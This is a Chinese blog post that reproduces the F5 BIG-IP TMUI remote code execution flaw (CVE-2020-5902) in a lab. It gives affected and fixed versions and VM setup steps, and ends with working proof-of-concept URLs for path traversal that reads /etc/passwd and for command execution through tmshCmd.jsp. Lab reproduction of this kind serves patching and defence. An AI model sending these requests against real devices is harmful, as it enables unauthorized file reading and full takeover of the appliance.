(有下載鏈接)F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

前言

漏洞詳情

F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、web網關、負載均衡等功能的應用交付平臺。

在 F5 BIG-IP 產品的流量管理用戶頁面 (TMUI)/配置實用程序的特定頁面中存在一處遠程代碼執行漏洞。

未授權的遠程攻擊者通過向該頁面發送特製的請求包,可以造成任意Java 代碼執行。進而控制 F5 BIG-IP 的全部功能,包括但不限於: 執行任意系統命令、開啓/禁用服務、創建/刪除服務器端文件等。

影響版本

BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5

修復建議

通用修補建議:
升級到以下版本

BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2

環境搭建

在下面頁面登錄註冊,之後申請祕鑰

https://www.f5.com.cn/trials/big-ip-virtual-edition

打開下載頁面

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4

選擇下載的版本
在這裏插入圖片描述
選擇版本
在這裏插入圖片描述
下載完成後在虛擬機-文件-打開
在這裏插入圖片描述
其他全都默認設置
使用默認密碼
root-default登錄
在這裏插入圖片描述
配置ip地址

config

在這裏插入圖片描述
默認兩次回車即可
在這裏插入圖片描述
訪問管理頁面

https://192.168.123.15/

在這裏插入圖片描述
使用默認賬戶密碼admin-admin登錄
在這裏插入圖片描述
點擊next輸入證書激活
在這裏插入圖片描述
這個郵件會發送到註冊的郵箱
點擊next
在這裏插入圖片描述
將生成的license粘貼到下面的網頁去激活
在這裏插入圖片描述
將獲得的license粘貼回第三部
在這裏插入圖片描述
在這裏插入圖片描述
點擊next
重新登錄
激活成功
在這裏插入圖片描述
復現成功版本14.1.2
下載鏈接

http://downloads05.f5.com/esd/download.sv?loc=downloads05.f5.com/downloads/2d436b59-25af-43c4-ab3f-9ebb1d6f5ee6/BIGIP-14.1.2-0.0.37.ALL-scsi.ova

漏洞復現

這裏總共使用了三個版本,其中11.6.111.6.4,都可以成功激活並使用
在這裏插入圖片描述
但是使用poc就會404

https://192.168.123.15/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

在這裏插入圖片描述
14.1.2版本測試可以用

https://192.168.164.167/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

在這裏插入圖片描述
文件讀取

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

rce

https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

參考文章

https://www.anquanke.com/post/id/209767
https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章